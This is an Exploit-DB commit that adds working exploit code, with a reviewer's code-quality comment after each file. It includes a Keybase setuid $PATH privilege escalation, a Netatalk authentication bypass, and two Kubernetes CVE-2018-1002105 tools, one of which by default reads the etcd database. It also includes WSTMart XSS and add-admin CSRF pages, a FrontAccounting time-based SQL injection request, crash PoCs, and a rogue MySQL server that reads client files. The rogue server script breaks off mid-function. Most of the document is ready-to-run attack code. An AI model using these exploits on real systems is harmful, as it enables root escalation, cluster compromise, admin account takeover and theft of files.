DB: 2018-12-25

15 changes to exploits/shellcodes

Angry IP Scanner for Linux 3.5.3 - Denial of Service (PoC)
Google Chrome 70 - SQLite Magellan Crash (PoC)
Microsoft Windows - 'MsiAdvertiseProduct' Arbitrary File Copy/Read
Keybase keybase-redirector - '$PATH' Local Privilege Escalation
Adobe Flash ActiveX Plugin 28.0.0.137 - Remote Code Execution (PoC)
Netatalk - Bypass Authentication
Kubernetes - (Unauthenticated) Arbitrary Requests
Kubernetes - (Authenticated) Arbitrary Requests
WSTMart 2.0.8 - Cross-Site Scripting
WSTMart 2.0.8 - Cross-Site Request Forgery (Add Admin)
FrontAccounting 2.4.5 - 'SubmitUser' SQL Injection
phpMyAdmin 4.8.4 - 'AllowArbitraryServer' Arbitrary File Read
PhpSpreadsheet < 1.5.0 - XML External Entity (XXE)

Linux/x86 - Kill All Processes Shellcode (14 bytes)
Offensive Security 2018-12-25 05:01:44 +00:00
parent 0275ca3128
commit 1b31850a46
17 changed files with 1105 additions and 10 deletions

exploits/linux/dos/46038.py Executable file

@ -0,0 +1,24 @@
# Exploit Title: Angry IP Scanner for Linux 3.5.3 - Denial of Service (PoC)
# Discovery by: Mr Winst0n
# Discovery Date: 2018-12-22
# Vendor Homepage: https://angryip.org/
# Software Link : https://angryip.org/download/
# Tested Version: 3.5.3 (latest version)
# Tested on: Kali linux
# Vulnerability Type: Denial of Service (DoS)
# Steps to Produce the Crash:
# 1.- Run python code : python angryip.py
# 2.- Open Xangry.txt and copy content to clipboard
# 3.- Open Angry IP Scanner
# 4.- Go to "Tools" in toolbar, click on "Preferences", then in the tab "Ports",
# 5.- Paste ClipBoard on "Port selection", and click on "OK",
# 6.- Crashed
#!/usr/bin/env python
buffer = "\x41" * 384
crash = buffer + "BBBB" + "CCCC"
f = open("Xangry.txt", "w")
f.write(crash)
f.close()
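Review bot: the shebang `#!/usr/bin/env python` sits after the comment header instead of on line 1, so it is never honoured and the script only runs when an interpreter is named explicitly; move it to the top of the file. The reproduction step `python angryip.py` also names a file that does not match the committed path exploits/linux/dos/46038.py, and the header offers no crash evidence (exception text or stack trace) for a PoC that only writes 392 bytes of 'A'/'B'/'C' to Xangry.txt, so a reader cannot tell whether the "crash" is a hang, an uncaught exception or a process termination.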


@ -0,0 +1,94 @@
keybase-redirector is a setuid root binary. keybase-redirector calls the fusermount binary using a relative path and the application trusts the value of $PATH. This allows a local, unprivileged user to trick the application to executing a custom fusermount binary as root.
## Environment
CentOS Linux release 7.4.1708 (Core)
3.10.0-693.17.1.el7.x86_64
RPM info
```
Name : keybase
Version : 2.8.0.20181017144746.3efc4cbf3c
Release : 1
Architecture: x86_64
Install Date: Mon 22 Oct 2018 05:30:36 PM EDT
Group : Unspecified
Size : 273302678
License : BSD
Signature : RSA/SHA256, Wed 17 Oct 2018 10:55:21 AM EDT, Key ID 47484e50656d16c7
Source RPM : keybase-2.8.0.20181017144746.3efc4cbf3c-1.src.rpm
Build Date : Wed 17 Oct 2018 10:54:47 AM EDT
Build Host : 6ae61e160e87
Relocations : (not relocatable)
Summary : Keybase command line client
Description :
Keybase command line client
```
An unprivileged user named user1 is used for this PoC.
## Steps to reproduce
1) Display privileges of user 1 - execute the id command
```
[user1@localhost woot]$ id
uid=1000(user1) gid=1000(user1) groups=1000(user1) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
```
2) Create a custom fusermount application. This PoC will create /w00t as root. Arbitrary commands can be executed.
```
cat >fusermount.c<<EOF
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
int main(int argc, char **argv)
{
setreuid(0,0);
system("/usr/bin/touch /w00t");
return(0);
}
EOF
``
3) Compile fusermount.c
```
gcc -Wall fusermount.c -o fusermount
```
4) Verify that /w00t does not exist.
```
[user1@localhost woot]$ ls -ld /w00t
ls: cannot access /w00t: No such file or directory
```
5) Prepend the PATH environment variable with a dot(for current working directory) and execute keybase-redirector which in turn will execute the malicious fusermount binary as root.
```
env PATH=.:$PATH /usr/bin/keybase-redirector /keybase
```
6) Enter the control-c sequence to kill the application.
```
[user1@localhost woot]$ env PATH=.:$PATH /usr/bin/keybase-redirector /keybase
^C
```
7) Verify that /w00t exists
```
[user1@localhost woot]$ ls -ld /w00t
-rw-rw-r--. 1 root user1 0 Oct 22 16:34 /w00t
[user1@localhost woot]$
```
## Impact
Unauthorized root access is possible which impacts the confidentially, integrity, and availability of the system.
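Review bot: the fence that closes the `cat >fusermount.c<<EOF` block uses two backticks (``) instead of three, which leaves that block open and inverts every later fence when the markdown renders; change it to ```. Two documentation points as well: 'confidentially' in the Impact section should be 'confidentiality', and the advisory records the vulnerable RPM version exactly but never says which release fixes the issue or what the remediation is, even though the opening paragraph already identifies the cause (a setuid binary resolving `fusermount` by relative path through the caller's `$PATH`), so a one-line note on the fix would complete the entry.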


@ -0,0 +1,136 @@
<!---
title: Crash Chrome 70 with the SQLite Magellan bug
categories: chrome
permalink: /sqlitebug/
layout: post
---!>
<p>This proof-of-concept crashes the Chrome renderer process using <a href="https://blade.tencent.com/magellan/index_en.html">Tencent Blade Team's Magellan SQLite3 bug</a>. It's based on <a href="https://www.sqlite.org/src/info/940f2adc8541a838">a SQLite test case</a> from the commit that fixed the bug.</p>
<p><span id="prompttext">If you're using Chrome 70 or below, tap the button below to crash this page:</span></p>
<button onClick="crash()" style="font-size: 150%">Crash this page</button>
<p>Your browser's user agent is: <span id="browserUserAgent">not available without JavaScript. Turn it on!</span></p>
<p><a href="https://github.com/zhuowei/worthdoingbadly.com/blob/master/_posts/2018-12-14-sqlitebug.html">Source code for this page on GitHub</a>.</p>
<h1>Sign up for more information</h1>
<p>I'm working on understanding how this issue affects browsers. To get notified when I update this page, please sign up to my mailing list:</p>
<form action="https://worthdoingbadly.us18.list-manage.com/subscribe/post?u=3f9820ca33ce6a7b1e682c9ac&id=014e6793b7&SIGNUP=inline-sqlitebug" method="post" id="mc-embedded-subscribe-form-inline" name="mc-embedded-subscribe-form-inline" class="validate" target="_blank">
<input type="email" value="" name="EMAIL" class="required email" id="mce-EMAIL" placeholder="Email">
<div style="position: absolute; left: -5000px;" aria-hidden="true"><input type="text" name="b_3f9820ca33ce6a7b1e682c9ac_014e6793b7" tabindex="-1" value=""></div>
<input type="submit" value="Subscribe" name="subscribe" id="mc-embedded-subscribe" class="button">
</form>
<h1>What's supposed to happen?</h1>
<p>After you press the button, the page should crash:</p>
<p><img src="/assets/blog/sqlitebug/sqlite_cropped.png" alt="screenshot"></p>
<p>On Android 5.1, I get a segfault in memcpy:</p>
<pre style="font-size: 10px">
F/libc ( 3801): Fatal signal 11 (SIGSEGV), code 1, fault addr 0xe0ddb457 in tid 3854 (Database thread)
I/DEBUG ( 142): *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
I/DEBUG ( 142): Build fingerprint: 'google/nakasi/grouper:5.1/LMY47D/1743759:user/release-keys'
I/DEBUG ( 142): Revision: '0'
I/DEBUG ( 142): ABI: 'arm'
I/DEBUG ( 142): pid: 3801, tid: 3854, name: Database thread >>> com.android.chrome:sandboxed_process6 <<<
I/DEBUG ( 142): signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0xe0ddb457
I/DEBUG ( 142): r0 e0ddb457 r1 611be0ab r2 00000002 r3 ff000000
I/DEBUG ( 142): r4 611be038 r5 00000002 r6 611be0a9 r7 7fffffff
I/DEBUG ( 142): r8 00000001 r9 611be0ab sl 80000001 fp 00000000
I/DEBUG ( 142): ip 00000066 sp 6defd3a0 lr 00000074 pc 4025eb62 cpsr 680f2430
I/DEBUG ( 142):
I/DEBUG ( 142): backtrace:
I/DEBUG ( 142): #00 pc 0000fb62 /system/lib/libc.so (__memcpy_base+217)
I/DEBUG ( 142): #01 pc 018d0e1d /data/app/com.android.chrome-1/base.apk
</pre>
<h1>What's affected?</h1>
<p>Affected: tested, causes one tab/one window to crash:</p>
<ul>
<li>Chrome 70.0.3538.110 on Android 5.1 and 9</li>
<li>Electron 2.0.12 on macOS 10.14</li>
</ul>
<p>Not affected:</p>
<ul>
<li>Chrome 71.0.3578.98 on Android 8.1 (already fixed)</li>
<li>Safari (doesn't have FTS enabled in SQLite3)</li>
<li>Browsers not based on Chrome (no WebSQL support)</li>
</ul>
<script>
// https://gist.github.com/nolanlawson/0264938033aca2201012
// https://www.sqlite.org/src/info/940f2adc8541a838
const db = openDatabase('fts_demo', 1, 'fts_demo', 5000000);
const firstStatements = [
"DROP TABLE IF EXISTS ft;",
"CREATE VIRTUAL TABLE ft USING fts3;",
"INSERT INTO ft VALUES('aback');",
"INSERT INTO ft VALUES('abaft');",
"INSERT INTO ft VALUES('abandon');",
];
const secondStatements = [
"SELECT quote(root) from ft_segdir;",
"UPDATE ft_segdir SET root = X'0005616261636B03010200FFFFFFFF070266740302020003046E646F6E03030200';",
"SELECT * FROM ft WHERE ft MATCH 'abandon';"
];
function dbSuccess() {
console.log("success");
console.log(arguments);
}
function dbErr() {
console.log("err");
console.log(arguments);
}
function runAll(statements, success) {
db.transaction((tx) => {
console.log("alive");
for (const statement of statements) {
console.log("queueing " + statement);
tx.executeSql(statement, [], dbSuccess, dbErr);
}
console.log("queued");
}, dbErr, success);
}
function crash() {
runAll(firstStatements, (event) => {
console.log(event);
runAll(secondStatements, (event) => {
console.log(event);
});
});
}
// onload
function getChromeVersion(userAgent) {
for (const part of userAgent.split(" ")) {
if (part.startsWith("Chrome/") || part.startsWith("Chromium/")) {
return part.substring(part.indexOf("/") + 1);
}
}
return null;
}
function isChromeSupported(chromeVersion) {
if (chromeVersion == null) return false;
const firstPart = chromeVersion.substring(0, chromeVersion.indexOf("."));
return parseInt(firstPart) <= 70;
}
function getPromptText(userAgent) {
const chromeVersion = getChromeVersion(userAgent);
if (chromeVersion == null) {
return "This demo only works on Chrome 70 or below. Open this page in Chrome 70, then tap the button.";
}
const chromeOK = isChromeSupported(chromeVersion);
if (chromeOK) {
return "You're using Chrome 70 or below, so you may be vulnerable. Tap the button to crash this page.";
}
return "Your Chrome is too new. Open this page in Chrome 70, then tap the button.";
}
function onLoad() {
document.getElementById("browserUserAgent").textContent = navigator.userAgent;
document.getElementById("prompttext").textContent = getPromptText(navigator.userAgent);
}
window.onload = onLoad;
</script>
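Review bot: `const db = openDatabase(...)` runs at script load, so on any browser without WebSQL (the 'Not affected' list itself says browsers not based on Chrome have none) it throws a ReferenceError before `window.onload = onLoad` executes, and the page never replaces the 'not available without JavaScript' placeholder or the prompt text; open the database lazily inside `crash()` or guard it with `typeof openDatabase === 'function'`. The Mailchimp signup form (the `<form action="https://worthdoingbadly.us18.list-manage.com/...">` block with its list id and honeypot field) is the author's blog boilerplate rather than part of the PoC and should be dropped from an Exploit-DB entry. Minor: the front-matter comment is closed with `---!>`, which browsers accept only as a parse error; the standard terminator is `-->`.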


@ -0,0 +1,44 @@
import socket
import struct
import sys
if len(sys.argv) != 3:
sys.exit(0)
ip = sys.argv[1]
port = int(sys.argv[2])
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[+] Attempting connection to " + ip + ":" + sys.argv[2]
sock.connect((ip, port))
dsi_payload = "\x00\x00\x40\x00" # client quantum
dsi_payload += '\x00\x00\x00\x00' # overwrites datasize
dsi_payload += struct.pack("I", 0xdeadbeef) # overwrites quantum
dsi_payload += struct.pack("I", 0xfeedface) # overwrites the ids
dsi_payload += struct.pack("Q", 0x63b660) # overwrite commands ptr
dsi_opensession = "\x01" # attention quantum option
dsi_opensession += struct.pack("B", len(dsi_payload)) # length
dsi_opensession += dsi_payload
dsi_header = "\x00" # "request" flag
dsi_header += "\x04" # open session command
dsi_header += "\x00\x01" # request id
dsi_header += "\x00\x00\x00\x00" # data offset
dsi_header += struct.pack(">I", len(dsi_opensession))
dsi_header += "\x00\x00\x00\x00" # reserved
dsi_header += dsi_opensession
sock.sendall(dsi_header)
resp = sock.recv(1024)
print "[+] Open Session complete"
afp_command = "\x01" # invoke the second entry in the table
afp_command += "\x00" # protocol defined padding
afp_command += "\x00\x00\x00\x00\x00\x00" # pad out the first entry
afp_command += struct.pack("Q", 0x4295f0) # address to jump to
dsi_header = "\x00" # "request" flag
dsi_header += "\x02" # "AFP" command
dsi_header += "\x00\x02" # request id
dsi_header += "\x00\x00\x00\x00" # data offset
dsi_header += struct.pack(">I", len(afp_command))
dsi_header += '\x00\x00\x00\x00' # reserved
dsi_header += afp_command
print "[+] Sending get server info request"
sock.sendall(dsi_header)
resp = sock.recv(1024)
print resp
print "[+] Fin."
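Review bot: this file carries none of the usual header (title, author, date, tested version, CVE or reference), so nothing ties the hard-coded addresses `0x63b660` and `0x4295f0` to a specific Netatalk build and nothing connects the file to the 'Netatalk - Bypass Authentication' line in the commit message; please add it so the entry can be reviewed and reproduced. Two portability points: `struct.pack("I", ...)` and `struct.pack("Q", ...)` use native byte order and size while the DSI header deliberately uses `>I`, so the payload layout depends on the host the script runs on, and the Python 2 `print` statements and str-typed payloads will not run under Python 3 without changes, which the file should state.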

exploits/multiple/remote/46052.py Executable file

@ -0,0 +1,169 @@
#!/usr/bin/env python3
import argparse
from ssl import wrap_socket
from json import loads, dumps
from socket import create_connection
def request_stage_1(base, version, target):
stage_1 = ""
with open('ustage_1', 'r') as stage_1_fd:
stage_1 = stage_1_fd.read()
return stage_1.format(base, version, target
).encode('utf-8')
def request_stage_2(base, version, target_api, target):
stage_2 = ""
with open('ustage_2', 'r') as stage_2_fd:
stage_2 = stage_2_fd.read()
return stage_2.format(base, version, target_api, target,
).encode('utf-8')
def read_data(ssock):
data = []
data_incoming = True
while data_incoming:
data_in = ssock.recv(4096)
if not data_in:
data_incoming = False
elif data_in.find(b'\n\r\n0\r\n\r\n') != -1:
data_incoming = False
offset_1 = data_in.find(b'{')
offset_2 = data_in.find(b'}\n')
if offset_1 != -1 and offset_2 != -1:
data_in = data_in[offset_1-1:offset_2+1]
elif offset_1 != -1:
data_in = data_in[offset_1-1:]
elif offset_2 != -1:
data_in = data_in[:offset_2-1]
data.append(data_in)
return data
def run_exploit(target, stage_1, stage_2, filename, json):
host, port = target.split(':')
with create_connection((host, port)) as sock:
with wrap_socket(sock) as ssock:
print('[*] Building pipe ...')
ssock.send(stage_1)
data_in = ssock.recv(15)
if b'HTTP/1.1 200 OK' in data_in:
print('[+] Pipe opened :D')
read_data(ssock)
else:
print('[-] Not sure if this went well...')
print(f"[*] Attempting to access url")
ssock.send(stage_2)
data_in = ssock.recv(15)
if b'HTTP/1.1 200 OK' in data_in:
print('[+] Pipe opened :D')
data = read_data(ssock)
return data
def parse_output(data, json, filename):
if json:
j = loads(''.join(i.decode('utf-8')
for i in data))
data = dumps(j, indent=4)
if filename:
mode = 'w+'
else:
mode = 'wb+'
if filename:
print(f"[*] Writing output to (unknown) ....")
with open(filename, mode) as fd:
if json:
fd.write(data)
else:
for msg in data:
fd.write(msg)
print('[+] Done!')
else:
if json:
print(data)
else:
print(''.join(msg.decode('unicode_escape') for msg in data))
def main():
parser = argparse.ArgumentParser(description='Unauthenticated PoC for'
' CVE-2018-1002105')
required = parser.add_argument_group('required arguments')
optional = parser.add_argument_group('optional arguments')
required.add_argument('--target', '-t', dest='target', type=str,
help='API server target:port', required=True)
required.add_argument('--api-base', '-b', dest='base', type=str,
help='Target API name i.e. "servicecatalog.k8s.io"',
default="servicecatalog.k8s.io")
required.add_argument('--api-target', '-u', dest='target_api', type=str,
help='API to access i.e. "clusterservicebrokers"',
default="clusterservicebrokers")
optional.add_argument('--api-version', '-a', dest='version', type=str,
help='API version to use i.e. "v1beta1"',
default="v1beta1")
optional.add_argument('--json', '-j', dest='json', action='store_true',
help='Print json output', default=False)
optional.add_argument('--filename', '-f', dest='filename', type=str,
help='File to save output to', default=False)
args = parser.parse_args()
if args.target.find(':') == -1:
print("f[-] invalid target {args.target}")
return False
stage1 = request_stage_1(args.base, args.version, args.target)
stage2 = request_stage_2(args.base, args.version, args.target_api,
args.target)
output = run_exploit(args.target, stage1, stage2, args.filename, args.json)
parse_output(output, args.json, args.filename)
if __name__ == '__main__':
main()
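Review bot: `print("f[-] invalid target {args.target}")` has the `f` inside the quotes, so the message is printed literally without the target; it should read `print(f"[-] invalid target {args.target}")` as in the sibling script 46053.py. The request templates `ustage_1` and `ustage_2` are read from the working directory but are not among the files changed by this commit, so the PoC cannot run as committed; either include them or document their format. Smaller points: `[*] Writing output to (unknown) ....` never names the path held in `filename`, `run_exploit` accepts `filename` and `json` but never uses them, and `ssl.wrap_socket` is deprecated and performs no certificate validation, which a PoC against an API server should at least state.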

exploits/multiple/remote/46053.py Executable file

@ -0,0 +1,132 @@
#!/usr/bin/env python3
import argparse
from ssl import wrap_socket
from socket import create_connection
from secrets import base64, token_bytes
def request_stage_1(namespace, pod, method, target, token):
stage_1 = ""
with open('stage_1', 'r') as stage_1_fd:
stage_1 = stage_1_fd.read()
return stage_1.format(namespace, pod, method, target,
token).encode('utf-8')
def request_stage_2(target, namespace, pod, container, command):
stage_2 = ""
command = f"command={'&command='.join(command.split(' '))}"
with open('stage_2', 'r') as stage_2_fd:
stage_2 = stage_2_fd.read()
key = base64.b64encode(token_bytes(20)).decode('utf-8')
return stage_2.format(namespace, pod, container, command,
target, key).encode('utf-8')
def run_exploit(target, stage_1, stage_2, method, filename, ppod,
container):
host, port = target.split(':')
with create_connection((host, port)) as sock:
with wrap_socket(sock) as ssock:
print(f"[*] Building pipe using {method}...")
ssock.send(stage_1)
if b'400 Bad Request' in ssock.recv(4096):
print('[+] Pipe opened :D')
else:
print('[-] Not sure if this went well...')
print(f"[*] Attempting code exec on {ppod}/{container}")
ssock.send(stage_2)
if b'HTTP/1.1 101 Switching Protocols' not in ssock.recv(4096):
print('[-] Exploit failed :(')
return False
data_incoming = True
data = []
while data_incoming:
data_in = ssock.recv(4096)
data.append(data_in)
if not data_in:
data_incoming = False
if filename:
print(f"[*] Writing output to (unknown) ....")
with open(filename, 'wb+') as fd:
for msg in data:
fd.write(msg)
print('[+] Done!')
else:
print(''.join(msg.decode('unicode-escape')
for msg in data))
def main():
parser = argparse.ArgumentParser(description='PoC for CVE-2018-1002105.')
required = parser.add_argument_group('required arguments')
optional = parser.add_argument_group('optional arguments')
required.add_argument('--target', '-t', dest='target', type=str,
help='API server target:port', required=True)
required.add_argument('--jwt', '-j', dest='token', type=str,
help='JWT token for service account', required=True)
required.add_argument('--namespace', '-n', dest='namespace', type=str,
help='Namespace with method access',
default='default')
required.add_argument('--pod', '-p', dest='pod', type=str,
required=True, help='Pod with method access')
required.add_argument('--method', '-m', dest='method', choices=['exec',
'portforward', 'attach'], required=True)
optional.add_argument('--privileged-namespace', '-s', dest='pnamespace',
help='Target namespace', default='kube-system')
optional.add_argument('--privileged-pod', '-e', dest='ppod', type=str,
help='Target privileged pod',
default='etcd-kubernetes')
optional.add_argument('--container', '-c', dest='container', type=str,
help='Target container', default='etcd')
optional.add_argument('--command', '-x', dest='command', type=str,
help='Command to execute',
default='/bin/cat /var/lib/etcd/member/snap/db')
optional.add_argument('--filename', '-f', dest='filename', type=str,
help='File to save output to', default=False)
args = parser.parse_args()
if args.target.find(':') == -1:
print(f"[-] invalid target {args.target}")
return False
stage1 = request_stage_1(args.namespace, args.pod, args.method, args.target,
args.token)
stage2 = request_stage_2(args.target, args.pnamespace, args.ppod,
args.container, args.command)
run_exploit(args.target, stage1, stage2, args.method, args.filename,
args.ppod, args.container)
if __name__ == '__main__':
main()
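Review bot: `from secrets import base64, token_bytes` only works because `secrets` happens to import `base64` internally; use `import base64` directly so the script does not depend on an implementation detail of the standard library. As with 46052.py, the `stage_1` and `stage_2` request templates are read from disk but are not among the changed files, so the script is not runnable as committed and their format is undocumented. `--namespace` is listed under 'required arguments' although it has a default, and `run_exploit` returns `False` on failure while `main()` ignores the result, so the process exits 0 either way.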


@ -0,0 +1,25 @@
# Exploit Title: WSTMart 2.0.8 - Cross-Site Scripting
# Date: 2018-12-23
# Exploit Author: linfeng
# Vendor Homepage: https://github.com/wstmall/wstmart/
# Software Link: http://www.wstmart.net/
# Version: WSTMart 2.0.8_181212
# CVE: CVE-2018-20367
# 0x01 stored XSS (PoC)
Function point: mall some commodity details - commodity consultation
poc:
POST /st/wstmart_v2.0.8_181212/index.php/home/goodsconsult/add.html HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: /
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://xx.xx.xx.xx/st/wstmart_v2.0.8_181212/goods-2.html
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 83
Connection: close
Cookie: PHPSESSID=d1jf7a74dk57sk5jebtg2nckeu; WSTMART_history_goods=think%3A%5B%222%22%2C%2265%22%5D; UM_distinctid=167d5b268981b9-03d665d7d22d54-4c312e7e-100200-167d5b2689945e; CNZZDATA1263804910=767510099-1545475868-%7C1545481454
goodsId=2&consultType=1&consultContent=%3Cimg+src%3Dx+onerror%3Dalert(%2Fxss%2F)%3E
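Review bot: the captured request still contains the submitter's session cookie and analytics identifiers (`PHPSESSID=...`, `UM_distinctid=...`, `CNZZDATA...`) even though the host was redacted to xx.xx.xx.xx; scrub the Cookie header before publishing. 'Function point: mall some commodity details - commodity consultation' reads as machine-translated; say plainly that the injection point is the consultation form (`goodsconsult/add.html`) on a product detail page and that `consultContent` is the parameter stored unescaped. The header also lacks the 'Tested on' line the other entries carry, and 'Vendor Homepage' and 'Software Link' appear swapped (the GitHub repository is given as the homepage and wstmart.net as the download link).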


@ -0,0 +1,51 @@
# Exploit Title: WSTMart 2.0.8 - Cross-Site Request Forgery (Add Admin)
# Date: 2018-12-23
# Exploit Author: linfeng
# Vendor Homepage:https://github.com/wstmall/wstmart/
# Software Link:http://www.wstmart.net/
# Version: WSTMart 2.0.8_181212
# CVE :CVE-2018-19138
# 0x02 CSRF PoC
# 18/5000
# Function point: background management - staff management - login account
# poc:
# 1234.html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Document</title>
</head>
<body>
<form action="http://xx.xx.xx.xx/st/wstmart_v2.0.8_181212/index.php/admin/staffs/add.html" id="test" name='test' method="POST">
<input type="hidden" name='staffId' value="" />
<input type="hidden" name='loginName' value="" />
<input type="hidden" name='staffPhoto' value="" />
<input type="hidden" name='loginPwd' value="" />
<input type="hidden" name='staffName' value="" />
<input type="hidden" name='staffNo' value="" />
<input type="hidden" name='RoleId' value="" />
<input type="hidden" name='staffPhone' value="" />
<input type="hidden" name='wxOpenId' value="" />
<input type="hidden" name='workStatus' value="" />
<input type="hidden" name='staffStatus' value="" />
</form>
<script type="text/javascript">
test.staffId.value="0";
test.loginName.value="admin3";
test.staffPhoto.value="";
test.loginPwd.value="admin3";
test.staffName.value="admin3";
test.staffNo.value="";
test.RoleId.value="0";
test.staffPhone.value="";
test.wxOpenId.value="";
test.workStatus.value="1";
test.staffStatus.value="1";
test.submit();
</script>
</body>
</html>
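Review bot: `# 18/5000` is a leftover character counter from a translation tool and should be removed, and 'Vendor Homepage:https://...' / 'Software Link:http://...' lack the space after the colon that the other headers use. The write-up should also state why the forged POST to admin/staffs/add.html is accepted (no per-request anti-CSRF token or origin check on the staff-add form), since that is the finding the PoC demonstrates, and note that the request only succeeds while the victim is logged in to the admin backend.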


@ -0,0 +1,37 @@
# Exploit Title: FrontAccounting 2.4.5 - 'SubmitUser' SQL Injection
# Google Dork: N/A
# Date: 2018-12-22
# Exploit Author: Sainadh Jamalpur
# Vendor Homepage: http://frontaccounting.com/
# Software Link: https://sourceforge.net/projects/frontaccounting/
# Version: 2.4.5
# Tested on: XAMPP version 3.2.2 in Windows 10 64bit, Kali linux X64
# CVE : N/A
# ========================= Vendor Summery =====================
#
# FrontAccounting (FA) is a professional web-based Accounting system for
# the entire ERP chain written in PHP, using MySQL. FA is multilingual and
# multicurrency.
#
# ======================== Vulnerability Description ===============
#
# the parameter "filterType" in /attachments.php is Vulnerable to Time
# Based Blind SQL Injection.
#
# ======================== PoC =======================================
POST /frontaccounting/admin/attachments.php? HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0)
Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://localhost/frontaccounting/admin/attachments.php?
Content-Type: application/x-www-form-urlencoded
Content-Length: 367
DNT: 1
Connection: close
Cookie:
Upgrade-Insecure-Requests: 1
user_name_entry_field=admin&password=1234&company_login_name=0&ui_mode=1&SubmitUser=%A0%A0Login+--%3E%A0%A0&_random=831749.090143524&_token=1RJ9WhkRWKszXu-uPm6DTQxx&_confirmed=&_modified=0&_focus=filterType&ADD_ITEM=Add+new&description=&trans_no=&filterType=(select*from(select(sleep(20)))a)&_focus=filterType&_modified=0&_confirmed=&_token=Om-2mt32ZC3UkLAuzPwoFgxx
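Review bot: the title names `SubmitUser` as the injected parameter, but both the description ('the parameter "filterType" in /attachments.php') and the payload (`filterType=(select*from(select(sleep(20)))a)`) identify `filterType`; `SubmitUser` is only the login button's value, so the title should be corrected. The request body also carries two sets of form fields (`_token=1RJ9...` and `_token=Om-2...`, two `_focus`, two `_modified`, two `_confirmed`), which looks like the login POST and the attachments POST concatenated; trimming it to the single attachments request would make the PoC clearer. 'Vendor Summery' should be 'Vendor Summary'.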

exploits/php/webapps/46041.py Executable file

@ -0,0 +1,260 @@
#!/usr/bin/env python
#coding: utf8
import socket
import asyncore
import asynchat
import struct
import random
import logging
import logging.handlers
PORT = 3306
log = logging.getLogger(__name__)
log.setLevel(logging.DEBUG)
tmp_format = logging.handlers.WatchedFileHandler('mysql.log', 'ab')
tmp_format.setFormatter(logging.Formatter("%(asctime)s:%(levelname)s:%(message)s"))
log.addHandler(
tmp_format
)
filelist = (
# r'c:\boot.ini',
r'c:\windows\win.ini',
# r'c:\windows\system32\drivers\etc\hosts',
# '/etc/passwd',
# '/etc/shadow',
)
#================================================
#=======No need to change after this lines=======
#================================================
__author__ = 'Gifts'
def daemonize():
import os, warnings
if os.name != 'posix':
warnings.warn('Cant create daemon on non-posix system')
return
if os.fork(): os._exit(0)
os.setsid()
if os.fork(): os._exit(0)
os.umask(0o022)
null=os.open('/dev/null', os.O_RDWR)
for i in xrange(3):
try:
os.dup2(null, i)
except OSError as e:
if e.errno != 9: raise
os.close(null)
class LastPacket(Exception):
pass
class OutOfOrder(Exception):
pass
class mysql_packet(object):
packet_header = struct.Struct('<Hbb')
packet_header_long = struct.Struct('<Hbbb')
def __init__(self, packet_type, payload):
if isinstance(packet_type, mysql_packet):
self.packet_num = packet_type.packet_num + 1
else:
self.packet_num = packet_type
self.payload = payload
def __str__(self):
payload_len = len(self.payload)
if payload_len < 65536:
header = mysql_packet.packet_header.pack(payload_len, 0, self.packet_num)
else:
header = mysql_packet.packet_header.pack(payload_len & 0xFFFF, payload_len >> 16, 0, self.packet_num)
result = "{0}{1}".format(
header,
self.payload
)
return result
def __repr__(self):
return repr(str(self))
@staticmethod
def parse(raw_data):
packet_num = ord(raw_data[0])
payload = raw_data[1:]
return mysql_packet(packet_num, payload)
class http_request_handler(asynchat.async_chat):
def __init__(self, addr):
asynchat.async_chat.__init__(self, sock=addr[0])
self.addr = addr[1]
self.ibuffer = []
self.set_terminator(3)
self.state = 'LEN'
self.sub_state = 'Auth'
self.logined = False
self.push(
mysql_packet(
0,
"".join((
'\x0a', # Protocol
'3.0.0-Evil_Mysql_Server' + '\0', # Version
#'5.1.66-0+squeeze1' + '\0',
'\x36\x00\x00\x00', # Thread ID
'evilsalt' + '\0', # Salt
'\xdf\xf7', # Capabilities
'\x08', # Collation
'\x02\x00', # Server Status
'\0' * 13, # Unknown
'evil2222' + '\0',
))
)
)
self.order = 1
self.states = ['LOGIN', 'CAPS', 'ANY']
def push(self, data):
log.debug('Pushed: %r', data)
data = str(data)
asynchat.async_chat.push(self, data)
def collect_incoming_data(self, data):
log.debug('Data recved: %r', data)
self.ibuffer.append(data)
def found_terminator(self):
data = "".join(self.ibuffer)
self.ibuffer = []
if self.state == 'LEN':
len_bytes = ord(data[0]) + 256*ord(data[1]) + 65536*ord(data[2]) + 1
if len_bytes < 65536:
self.set_terminator(len_bytes)
self.state = 'Data'
else:
self.state = 'MoreLength'
elif self.state == 'MoreLength':
if data[0] != '\0':
self.push(None)
self.close_when_done()
else:
self.state = 'Data'
elif self.state == 'Data':
packet = mysql_packet.parse(data)
try:
if self.order != packet.packet_num:
raise OutOfOrder()
else:
# Fix ?
self.order = packet.packet_num + 2
if packet.packet_num == 0:
if packet.payload[0] == '\x03':
log.info('Query')
filename = random.choice(filelist)
PACKET = mysql_packet(
packet,
'\xFB{0}'.format(filename)
)
self.set_terminator(3)
self.state = 'LEN'
self.sub_state = 'File'
self.push(PACKET)
elif packet.payload[0] == '\x1b':
log.info('SelectDB')
self.push(mysql_packet(
packet,
'\xfe\x00\x00\x02\x00'
))
raise LastPacket()
elif packet.payload[0] in '\x02':
self.push(mysql_packet(
packet, '\0\0\0\x02\0\0\0'
))
raise LastPacket()
elif packet.payload == '\x00\x01':
self.push(None)
self.close_when_done()
else:
raise ValueError()
else:
if self.sub_state == 'File':
log.info('-- result')
log.info('Result: %r', data)
if len(data) == 1:
self.push(
mysql_packet(packet, '\0\0\0\x02\0\0\0')
)
raise LastPacket()
else:
self.set_terminator(3)
self.state = 'LEN'
self.order = packet.packet_num + 1
elif self.sub_state == 'Auth':
self.push(mysql_packet(
packet, '\0\0\0\x02\0\0\0'
))
